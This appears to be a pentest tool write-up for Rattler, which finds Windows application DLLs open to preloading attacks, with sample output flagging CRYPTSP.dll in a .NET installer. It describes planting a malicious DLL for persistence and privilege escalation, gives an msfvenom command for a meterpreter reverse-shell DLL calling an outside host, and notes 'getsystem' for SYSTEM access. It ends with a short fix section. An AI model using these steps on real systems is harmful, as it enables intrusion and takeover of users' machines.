Rattler helps identify which application DLL’s are vulnerable to DLL preloading attacks. In a nutshell, DLL preloading attacks allow you to trick applications into loading and executing malicious DLL’s. DLL preloading attacks can result in escalation of privileges, persistence and RCE in some cases. While preloading attacks are nothing new, there were some interesting results found. For more information on DLL security, I found this link to be helpful.
Depending on the target executable location, Rattler may need to be run with elevated permissions.
ratter_32.exe “c:\path\to\target\application.exe” 1
- “c:\path\to\target\application.exe” =path to the executable you want to enumerate.
- 1 = Enumeration mode, only one at this point.
C:\Users\User\Desktop>Rattler_32.exe "C:\Users\User\Downloads\NDP462-KB3151800-x86-x64-AllOS-ENU.exe" 1 [+] RATTLER [*] TARGET APPLICATION: C:\Users\User\Downloads\NDP462-KB3151800-x86-x64-AllOS-ENU.exe [+] STARTING UP... [*] TARGET PROCESS ID: 3504 [+] IMPLEMENTING EXECUTABLE TEST [*] TARGETING DLL-> C:\Windows\SYSTEM32\CRYPTSP.dll [*] INFO: DLL IS VULNERABLE TO EXECUTABLE TEST-> C:\Windows\SYSTEM32\CRYPTSP.dll [*] TARGETING DLL-> C:\Windows\system32\rsaenh.dll [*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST [*] TARGETING DLL-> C:\Windows\SYSTEM32\ntmarta.dll [*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST [*] TARGETING DLL-> C:\Windows\SYSTEM32\feclient.dll [*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST [*] TARGETING DLL-> C:\Windows\system32\uxtheme.dll [*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST [*] TARGETING DLL-> C:\Windows\System32\MSCTF.dll [*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST [*] TARGETING DLL-> C:\Windows\system32\dwmapi.dll [*] TARGET DLL IS NOT VULNERABLE TO EXECUTABLE TEST [+] EXECUTABLE TEST TOTAL DLL's IDENTIFIED: 43 [+] EXECUTABLE TEST TOTAL VULN COUNT: 1 [*] EXECUTABLE TEST VULNERABLE DLL-> C:\Windows\SYSTEM32\CRYPTSP.dll
Rattler was developed using C++ using Microsoft Visual Studio 2015. Rattler can be used to test 64 and 32 bit applications. Rattler’s default “payload” is a DLL (payload.dll) which invokes calc.exe. The default payload is 32bit. A 64bit payload can be used in conjunction with the 64bit executable to enumerate 64bit executables.
Why do I use Rattler?
Rattler has made it quick and easy to identify a vector to get payloads executed. For example, if an application were to have ~100 DLL’s and if it took ~2 minutes to test each DLL, that is ~2 hours for a single application to be tested using a manual process. Additionally, the process for testing an application for DLL preloading vulnerabilities is rather simple and can be automated trivially using some C++, Windows API calls and fresh beard oil , hence Rattler.
Sure there are certain requirements to exploit DLL preloading vulnerabilities such as file access etc however the three most useful instances relate to post exploitation and they are, persistence, privilege escalation and RCE in some cases. When pwning a host, you may want persistence whether it’s to add to your botnet or merely pivot. One way to gain persistence is to exploit a DLL preloading vulnerability on the target host.
For example, if the target host has VoiceAndVideoApplicationX.exe installed and this executable is vulnerable to DLL preloading attacks then all I need to do is identify a vulnerable DLL using Rattler, drop my payload in the appropriate CWD and voila, every time the user/hosts runs VoiceAndVideoApplicationX.exe, my payload is executed as well.
Another useful tangent that Rattler can be used for is the elevation of privileges. One of the golden rules in pwning is that one tends to inherit the permissions of the exploited entity.
For example, if I have an installer in the ‘Downloads’ folder (which is untrusted FYI so very easy to write to this folder) and this installer requires admin privileges to install? What do you think happens when your malicious DLL is executed by the installer? To make this concrete, download the latest Windows .Net installer (NDP461-KB3102438-Web.exe) or (NDP462-KB3151800-x86-x64-AllOS-ENU.exe). Create a malicious DLL and place it in the Downloads folder and name the payload DLL to “CRYPTSP.dll”. Run the installer and voila, I will leave the remainder of this to the reader, you know where I am going;) If not, use the following command to generate a malicious DLL “msfvenom -p windows/meterpreter/reverse_tcp LHOST=220.127.116.11 LPORT=4444 -f DLL >beard.dll”, create your multi handler and once you get your connection back, run good ‘ol “getsystem” in your meterpreter session and voila. System via DLL preloading. It sounds better than it is but still, should this happen?
How to fix?
DLL preloading attacks are the result of applications not making use of fully qualified paths when loading DLL’s. The lack of FQP’s triggers the Windows search order and this is where we get our vulnerability. To address this, make use of fully qualified paths when utilizing DLL’s. Oh and maybe some DLL verification and validation might help, but that may be overkill.